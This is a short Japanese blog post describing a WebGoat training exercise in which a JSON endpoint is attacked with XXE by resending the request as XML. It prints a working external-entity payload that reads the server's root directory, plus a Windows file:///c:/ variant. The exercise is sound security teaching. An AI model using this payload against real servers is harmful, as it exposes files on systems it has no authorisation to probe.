Shikata Ga Nai

Private? There is no such things.

WebGOATでXXE④を演習してみた

 Hello there, ('ω')ノ

 

開発者が考えていなかったデータ形式を受け入れることができる場合があるとか。

なので、JSONエンドポイントがXXE攻撃に対して脆弱になる可能性があって。

再度、XMLインジェクションを実行してとのことで。

 

まずは、リクエストの内容を見るとJSONとなっているので。

 

f:id:ThisIsOne:20200725064627p:plain

 

JSONをXMLに変更して。

前回と同様にJSONデータをXMLデータに変更して。

 

<?xml version="1.0"?>
<!DOCTYPE comment [
<!ENTITY test SYSTEM "file:///">
]>
<comment><text>&test;</text></comment>

 

ちなみにサーバがLinuxではなく、Windowsの場合だと下記のように変更が必要で。

<!ENTITY test SYSTEM "file:///c:/">

 

f:id:ThisIsOne:20200725071414p:plain

 

前回同様にクリアできた。

 

f:id:ThisIsOne:20200725071512p:plain

 

Best regards, (^^ゞ